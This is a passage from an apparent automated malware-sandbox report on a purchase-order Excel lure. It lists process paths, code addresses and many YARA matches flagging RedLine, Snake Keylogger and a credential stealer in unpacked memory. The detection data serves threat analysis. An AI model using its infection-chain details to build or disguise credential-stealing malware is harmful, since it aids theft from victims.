Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2A338	9_2_00D2A338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2CD38	9_2_00D2CD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2ED38	9_2_00D2ED38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D28028	9_2_00D28028
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01338060	11_2_01338060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A2046	11_2_013A2046
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01398298	11_2_01398298
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0136E4FF	11_2_0136E4FF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0136676B	11_2_0136676B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013C4873	11_2_013C4873
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0135CAA0	11_2_0135CAA0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0133CAF0	11_2_0133CAF0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01366DD9	11_2_01366DD9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134CC39	11_2_0134CC39
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134B119	11_2_0134B119
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013391C0	11_2_013391C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01351394	11_2_01351394
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134120B	11_2_0134120B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01351706	11_2_01351706
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01337920	11_2_01337920
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134997D	11_2_0134997D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013519B0	11_2_013519B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0135781B	11_2_0135781B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01357A4A	11_2_01357A4A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01351C77	11_2_01351C77
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01357CA7	11_2_01357CA7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01351F32	11_2_01351F32
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013BBE44	11_2_013BBE44
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01369EEE	11_2_01369EEE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_005536F0	11_2_005536F0

Source: Orden de compra 0001-00255454.xlam.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01010A30 appears 46 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01339CB3 appears 31 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 0100F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01350A30 appears 46 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 00FF9CB3 appears 31 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 0134F9F2 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: String function: 029DC3A0 appears 34 times
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: String function: 029EFE30 appears 46 times

Source: sheet1.xml, type: SAMPLE	Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
